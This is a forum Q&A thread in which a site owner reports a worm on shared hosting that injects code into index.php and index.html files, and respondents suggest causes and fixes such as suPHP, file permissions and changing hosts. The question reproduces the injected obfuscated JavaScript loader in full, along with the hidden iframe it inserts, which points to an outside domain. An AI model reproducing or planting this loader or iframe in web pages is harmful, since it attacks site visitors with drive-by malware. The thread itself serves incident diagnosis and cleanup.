PHP parse error appearing on shared hosting environments

Question

Has anyone else seen this crop up a lot recently? I've had several sites go down with this error.

Parse error: syntax error, unexpected '<' in /home/public_html/index.PHP on line 39

It's caused by a worm / injection attack which dumps the following code seemingly at random throughout any index.php / index.html files it's able to find:

<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,0,-15,33,-30,6,33,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,63,-21,24,0,0,-15,33,-72,12,-33,18,3,48,3,-57,60,0,-18,6,-45,-33,69,-36,45,-12,24,0,0,27,-12,-78,-18,6,18,21,66,-21,-114,51,39,45,-87,51,18,-84,57,33,-72,12,-33,18,45,-9,-33,-9,36,-75,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,90,-93,90,42,3,-63,6,-75,24,9,-33,90,-21,-24,42,-81,63,63,-57,-75,24,9,-33,90,-9,51,-78,-42,33,30,-75,126,-39,-6,6,36,-36,-75,75,45,-78,51,-36,18,42,0,-84,21,-24,-27,102,-36,6,45,-45,30,-51,39,-45,63,-42,36,-105,9,111,-87,-3,-30,33,75,12,-27,-72,9,90,-15,-102,90,-72,9,-42,9,21,105,-48,33,-72,12,-33,18,-36,105,-15,-57,60,0,-18,18,0,18,-99,45,-27,93,-45,30,-51,24,-3,33,-72,12,-33,18,3,48,3,-21,24,0,0,24,-66,-12,42,30,-30,-15,15,39,-12,-78,-18,6,18,21,66,-21,-72,9,-3,15,72,-87,27,-60,33,-18,18,21,66,-36,-96,87,33,-72,12,-33,18,-45,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,81,-33,-9,-39,57,-57,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,99,-57,78,-9,-30,51,-78,-42,33,66,15,-39,-6,6,36,-36,-75,75,45,-78,21,-75,69,18,42,0,-84,21,-66,42,78,-9,-30,51,-78,-42,33,66,-96,102,-36,6,45,-45,30,-51,9,-75,60,63,-42,36,-105,9,111,-87,-45,42,78,-9,-30,51,-78,-42,33,66,-99,33,75,12,-57,-75,33,-33,42,78,-9,-30,51,-78,-42,33,66,21,-15,-102,60,-75,33,-33,42,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,-3,90,42,3,-63,-69,57,-57,24,9,-33,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,69,-24,42,-81,63,63,-132,57,-57,24,9,-33,99,-57,60,0,0,27,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,75,-51,-45,0,30,21,63,-78,18,18,-75,117,-33,24,-21,-57,60,0,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>

The code blindly inserts a javascript-sourced iFrame:

<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>

I've tried to rip the site apart to see how this happened, but does anyone know what specific attack this is and how it propagates? Is it leaky unpatched code, CPanel itself, cracked passwords, a rooted server?

EDIT

I've not been able to identify exactly what's going on here, but it appears that it's a CPanel thing - changing all passwords in CPanel seems to stop repeat attacks. I've left one unimportant site in this state (without cleaning the site code) and it's been absolutely fine whereas before it was getting corrupted daily. Contacted UK2.net and JustHost about this, but so far no response.

It also appears that the public_html folder and some of the other "system" folders have been chmod'd strangely - lots of 777 where there shouldn't be. Again no response from the hosts on this so far.

EDIT

Appears to be "Trojan.JS.Agent.bur" Trying to find out more...

Answer 1

It sounds like your sites have been victim to a worm which is injecting HTML/code into your files. Post the code in question next time and it can be analyzed. In the meantime, you should ensure all of your applications and system libraries are up to date with the latest security patches.

Answer 2

Are you running the shared hosting environment, or are you a customer?

What likely happened is the server was running every users code under the same user (probably 'apache' or 'httpd'). Then, all it takes is one vulnerable script by any customer on the machine, and everyone is essentially hacked.

If you aren't the operator of this server, there's very little you can do. You can try chomodding everything to 755, and making sure the owner of everything is your user instead of 'apache' or 'nobody'. However, this will only stop your files from being modified. It would still be possible for an attacker to read all your files (for example, your database credentials). Unless you can convince your host to change to suPHP or similar, I would strongly suggest looking for another host ASAP.

If you are the host, rebuild apache (with easyapache), and enable the suPHP option. You then need to chown each users files to be owned by their own user, and chmod then 755. suPHP will run each users code as their own user, which will prevent this type of attack.

Answer 3

It is either being injected via SQL injection to a database for your website or it was upload/exploited via an online File Mananger. I've seen this happen numerous times and typically when it was in all files it was executed via a web-based file management.

Needless to say, since you haven't gotten a response from the host yet I'd begin looking for a new company.

You'll most likely be stuck with the manual clean-up unless they (and you OK) a restore a recent, clean copy. I'd still look into moving to another company based off of their slow response.